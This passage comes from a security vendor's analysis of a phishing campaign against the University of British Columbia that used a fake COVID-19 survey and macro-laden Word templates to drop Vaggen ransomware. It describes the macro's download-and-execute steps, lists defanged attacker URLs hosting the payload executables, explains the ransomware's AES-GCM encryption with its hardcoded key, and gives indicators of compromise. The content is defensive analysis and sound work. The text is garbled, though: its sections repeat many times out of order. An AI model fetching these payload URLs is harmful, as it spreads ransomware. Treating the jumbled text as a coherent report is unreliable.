file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2526 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2527 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2528 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2529 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2530 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2531 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2532 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2533 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2534 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2535 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2536 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2537 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2538 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2539 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2540 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2541 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2542 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2543 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2544 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2545 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2546 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2547 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2548 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2549 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2550 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2551 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2552 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2553 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2554 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2555 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2556 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2557 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2558 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.